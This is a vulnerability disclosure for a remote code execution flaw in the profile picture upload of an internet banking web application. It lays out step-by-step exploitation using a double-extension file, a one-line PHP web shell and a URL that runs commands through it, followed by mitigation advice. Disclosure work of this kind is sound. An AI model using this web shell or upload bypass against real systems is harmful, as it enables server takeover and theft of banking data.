---

# CVE-2025-29017 - Internet Banking System 2.0.0 Remote Code Execution via Profile Picture Upload

## Description
A **Remote Code Execution (RCE)** vulnerability exists in **Code Astro Internet Banking System 2.0.0** due to **improper file upload validation** in the `profile_pic` parameter within `pages_view_client.php`. Attackers can bypass security checks by modifying the upload request, leading to **arbitrary code execution**.

## Affected Component
- `profile_pic` parameter in `pages_view_client.php`
- Upload function allows **malicious PHP file execution**

## Exploitation Steps
1. Navigate to the user profile settings and browse for a new profile picture.

<img src="https://github.com/user-attachments/assets/209e0d55-0db4-4d68-9a33-5739a0b3663d" width="100%" height="100%"><br><br>
<img src="https://github.com/user-attachments/assets/9058ce52-8ff2-4af8-8d7d-6a296ba00160" width="100%" height="100%">

2. Intercept the **profile picture upload request** using a tool like Burp Suite.

<img src="https://github.com/user-attachments/assets/058fad8f-e783-4692-936d-c794407733b0" width="100%" height="100%"><br>

3. Modify the file to double extension (.jpeg.php), modify Content-Type header to application/x-php and append malicious PHP code:

```php
<?php system($_GET['cmd']); ?>
```
<img src="https://github.com/user-attachments/assets/080d0f88-afc3-48fe-975f-f7394063a968" width="100%" height="100%"><br><br>
<img src="https://github.com/user-attachments/assets/08573ea1-1463-466f-8b00-6ab2b14aa230" width="100%" height="100%">

4. You can check if file is uploaded at /admin/dist/img/:

```console
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
```
<img src="https://github.com/user-attachments/assets/4b070663-d22d-4e7c-bb9a-73b00b67b01b" width="100%" height="100%"><br>

Impact

- Full Server Compromise
- Data Theft
- Privilege Escalation

Mitigation

- Restrict file uploads to image formats only and verify MIME types.
- Sanitize filenames and block files containing executable code.
- Store uploaded files outside the web root.

References

- OWASP File Upload Security
